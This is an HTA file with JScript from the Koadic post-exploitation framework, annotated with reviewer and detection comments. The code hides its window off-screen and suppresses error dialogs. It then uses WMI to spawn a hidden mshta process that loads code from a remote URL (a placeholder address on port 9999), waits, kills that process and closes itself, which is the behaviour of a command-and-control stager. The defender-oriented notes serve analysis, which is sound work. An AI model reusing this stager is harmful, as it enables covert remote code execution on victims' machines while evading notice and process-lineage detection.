<html> | |
<head> | |
<script language="JScript"> | |
// Move the HTA window far off-screen, drop focus and shrink it to 2x4 px so
// nothing is visible on the desktop while the script runs. Because the user
// never sees a window, the observable artifacts of this sample are the
// process/WMI activity below, not the UI.
window.moveTo(-1337, -2019);
window.blur();
window.resizeTo(2, 4);
try
{
// Suppress script-error dialogs and re-hide the window whenever it regains focus.
window.onerror = function(sMsg, sUrl, sLine) { return false; }
window.onfocus = function() { window.blur(); }
}
catch (e){}
// Global namespace for this stager. Koadic.WS is the WScript.Shell COM object
// that Koadic.shell.run uses to launch commands with a hidden window.
var Koadic = {};
Koadic.WS = new ActiveXObject("WScript.Shell");
// True when a global `window` object exists, i.e. the script is running
// inside an HTA/browser host rather than under wscript/cscript.
Koadic.isHTA = function()
{
return typeof(window) !== "undefined";
}
// Process helpers (currentPID / kill / list), all built on WMI Win32_Process.
Koadic.process = {};
//process.currentPID.start
// Attempts to return the PID of the process hosting this script. Technique:
// spawn a hidden `%comspec% /K hostname` child through WMI, find that child in
// Win32_Process by PID, read its ParentProcessId, then terminate the child.
// NOTE(review): Koadic.file.getPath is not defined anywhere in this listing,
// so as written the first statement throws; the only caller, Koadic.exit,
// swallows that exception.
// NOTE(review): a process created via Win32_Process.Create is typically
// parented by the WMI provider host rather than the caller, so the
// ParentProcessId read below is presumably not this script's PID — verify.
Koadic.process.currentPID = function()
{
var cmd = Koadic.file.getPath("%comspec% /K hostname");
//Koadic.WS.Run(cmd, 0, false);
var childPid = Koadic.WMI.createProcess(cmd);
var pid = -1;
// there could be a race condition, but CommandLine returns null on win2k
// and is often null on later windows with more harsh privileges
// todo: this method is stupid. instead of using .Run, spawn a WMI process.
// then we get child PID for free and can backtrack PPID, no race condition
var latestTime = 0; // unused since the PID match below replaced the time heuristic
var latestProc = null;
var processes = Koadic.process.list();
var items = new Enumerator(processes);
while (!items.atEnd())
{
var proc = items.item();
try
{
/*
if (proc.Name.indexOf("cmd") != -1)
{
if (latestTime == 0 && proc.CreationDate)
latestTime = proc.CreationDate;
if (proc.CreationDate > latestTime)
{
latestTime = proc.CreationDate;
latestProc = proc;
}
}
*/
// Match the WMI-spawned child by PID; the commented-out block above is the
// older name/creation-time heuristic it replaced.
if (proc.ProcessId == childPid)
{
latestProc = proc;
break;
}
} catch (e)
{
}
items.moveNext();
}
// If no entry matched, latestProc is still null and this line throws.
pid = latestProc.ParentProcessId;
latestProc.Terminate();
return pid;
}
//process.currentPID.end
//process.kill.start | |
// Walks Win32_Process and calls Terminate() on the first entry whose
// ProcessId equals `pid` (loose == compare, so a numeric string also matches).
// Returns true when a process was terminated; false when nothing matched or
// every matching Terminate() threw, since per-process exceptions are swallowed.
Koadic.process.kill = function(pid)
{
var processes = Koadic.process.list();
var items = new Enumerator(processes);
while (!items.atEnd())
{
var proc = items.item();
try
{
if (proc.ProcessId == pid)
{
proc.Terminate();
return true;
}
} catch (e)
{
}
items.moveNext();
}
return false;
}
//process.kill.end
//process.list.start | |
// Connects to the local WMI namespace root\cimv2 (impersonationLevel=impersonate)
// and returns the result set of every Win32_Process instance. Callers iterate
// it with an Enumerator.
Koadic.process.list = function()
{
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var query = "Select * From Win32_Process";
return wmi.ExecQuery(query);
}
// Tears down the script host. In an HTA it tries several ways of closing the
// window, each in its own try so a failure falls through to the next; then it
// calls WScript.quit(), which is not available in an HTA and so throws (swallowed);
// finally it tries to look up its own PID and kill it. Every branch swallows
// exceptions, so this never reports failure to a caller.
Koadic.exit = function()
{
if (Koadic.isHTA())
{
// crappy hack? -- successive window-close attempts, each tolerated to fail
try {
window.close();
} catch(e){}
try {
window.self.close();
} catch (e){}
try {
window.top.close();
} catch (e){}
try{
self.close();
} catch (e){}
try
{
// Re-opening the current window in place makes it script-owned so close() is allowed.
window.open('', '_self', '');
window.close();
}
catch (e)
{
}
}
try
{
WScript.quit();
}
catch (e)
{
}
try
{
// Last resort: find our own PID via WMI and terminate it (see the notes on
// Koadic.process.currentPID about whether this lookup actually succeeds).
var pid = Koadic.process.currentPID();
Koadic.process.kill(pid);
}
catch (e)
{
}
}
// WMI helpers.
Koadic.WMI = {};
//WMI.createProcess.start
// Launches `cmd` as a new process through WMI Win32_Process.Create with a
// hidden 1x1 window and returns the new process's PID (outParams.ProcessId).
// The method's ReturnValue is never checked, so on failure this presumably
// returns null/undefined rather than throwing.
// Detection note: a process created this way is typically attributed to the
// WMI provider host rather than to this script, so parent/child lineage alone
// will not tie it back here; WMI activity logging does.
Koadic.WMI.createProcess = function(cmd)
{
var SW_HIDE = 0;
var pid = 0; // unused; the PID is taken from outParams below
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
si.ShowWindow = SW_HIDE;
// 16777216 == 0x01000000, the CREATE_BREAKAWAY_FROM_JOB process-creation flag.
si.CreateFlags = 16777216;
si.X = si.Y = si.XSize = si.ySize = 1;
//wmi.Get("Win32_Process").Create(cmd, null, si, pid);
var w32proc = wmi.Get("Win32_Process");
var method = w32proc.Methods_.Item("Create");
var inParams = method.InParameters.SpawnInstance_();
inParams.CommandLine = cmd;
inParams.CurrentDirectory = null;
inParams.ProcessStartupInformation = si;
var outParams = w32proc.ExecMethod_("Create", inParams);
return outParams.ProcessId;
}
//WMI.createProcess.end
// Shell helpers backed by Koadic.WS (WScript.Shell).
Koadic.shell = {};
// Runs `cmd` via WScript.Shell.Run with window style 0 (hidden). `fork`
// defaults to true; when false the third argument becomes true and Run blocks
// until the command exits.
// NOTE(review): `c` (the "%comspec% /q /c" wrapper) is built but never used;
// `cmd` is passed to Run unchanged.
Koadic.shell.run = function(cmd, fork)
{
var fork = (typeof(fork) !== "undefined") ? fork : true;
var c = "%comspec% /q /c " + cmd;
Koadic.WS.Run(cmd, 0, !fork);
}
// Entry point of the stager: launch a second, hidden mshta against a remote URL
// (x.x.x.x:9999 is a placeholder in this sample), block for roughly ten seconds
// by running `ping 127.0.0.1 -n 11` synchronously as a sleep, then force-kill
// the spawned mshta by PID and tear down this host. For defenders, the
// observable chain is: mshta creating another mshta with a URL argument via
// WMI, a hidden ping to loopback, then taskkill /f -- all within seconds.
try{
var a = Koadic.WMI.createProcess('mshta http://x.x.x.x:9999/test123');
Koadic.shell.run('ping 127.0.0.1 -n 11', false);
Koadic.shell.run('taskkill /f /pid '+a);
}catch(e) {}
Koadic.exit();
</script> | |
<hta:application caption="no" windowState="minimize" showInTaskBar="no" | |
scroll="no" navigable="no" /> | |
<!-- --> | |
</head> | |
<body> | |
</body> | |
</html> |